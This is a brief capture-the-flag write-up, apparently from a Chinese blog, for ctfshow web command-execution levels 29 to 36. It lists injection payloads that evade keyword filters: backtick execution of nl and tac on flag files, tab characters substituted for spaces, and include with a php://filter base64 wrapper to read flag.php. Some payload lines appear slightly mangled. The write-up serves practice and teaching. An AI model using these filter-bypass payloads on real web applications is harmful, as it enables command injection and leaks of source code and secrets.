ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
C+-C资深大佬13 小时前
python while循环
服务器·开发语言·python
Tian_Hang13 小时前
eclipse ditto 学习笔记
运维·服务器·开发语言·javascript·3d
江畔柳前堤13 小时前
第13章:docker生产环境部署实战
运维·git·docker·容器·代码复审
爱喝水的鱼丶13 小时前
SAP-ABAP:接口 vs 抽象类:ABAP OOP两类扩展方式的差异与选型原则
运维·性能优化·sap·abap·erp·经验交流
iCxhust13 小时前
linux目录是否保存在硬盘 启动后读入解析的
linux·运维·服务器
懒鸟一枚13 小时前
Linux 系统 Service 服务配置详解
linux·服务器·网络
敖行客 Allthinker14 小时前
企业级多台服务器组装 K3s 高性能集群实战指南
运维·服务器·团队开发
RisunJan14 小时前
Linux命令-readonly(Bash 内建设置只读变量)
linux
m0_7373025815 小时前
OpenClaw:赋予大模型执行能力的开源本地 AI 智能体
服务器
Web极客码15 小时前
在WordPress Multisite中添加超级管理员用户
服务器·php·网站